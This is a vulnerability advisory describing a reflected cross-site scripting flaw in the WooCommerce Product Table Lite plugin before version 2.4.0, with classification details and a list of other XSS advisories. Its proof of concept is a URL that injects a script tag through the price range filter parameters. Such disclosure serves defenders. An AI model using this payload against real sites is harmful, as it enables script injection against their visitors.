WooCommerce Product Table Lite < 2.4.0 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not escape the price_range_min and price_range_max parameters before outputting them back in attributes, leading a Reflected Cross-Site Scripting issue

Proof of Concept

On a page where there is a Product Table with a Price filter, append the following payload to the min and max price filters:"><script>alert(/XSS/)

https://example.com/page-with-table-and-price-filter/?1601_price_range=option_0&1601_price_range_max=50"><script>alert(/XSS-max/)</script>&1601_price_range_min=10"><script>alert(/XSS-min/)</script>&

Affects Plugins

wc-product-table-lite

Fixed in 2.4.0

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

1b0fdc4e-5f7b-4d95-b2a7-7e3954b759fa

Timeline

Publicly Published

2021-09-27 (about 4 years ago)

Added

2021-09-27 (about 4 years ago)

Last Updated

2021-09-27 (about 4 years ago)

Other

Published

Title

Published

2024-03-25

Title

NPS computy < 2.7.6 - Admin+ Stored XSS

Published

2024-05-21

Title

Elegant Addons for elementor <= 1.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via HTML tags

Published

2018-10-31

Title

WP Editor.md <= 10.0.3 - Cross-Site Scripting (XSS)

Published

2014-08-01

Title

Custom Tables 3.4.4 - iframe.php key Parameter XSS

Published

2021-06-07

Title

Recently < 3.0.5 - Authenticated Stored Cross-Site Scripting (XSS)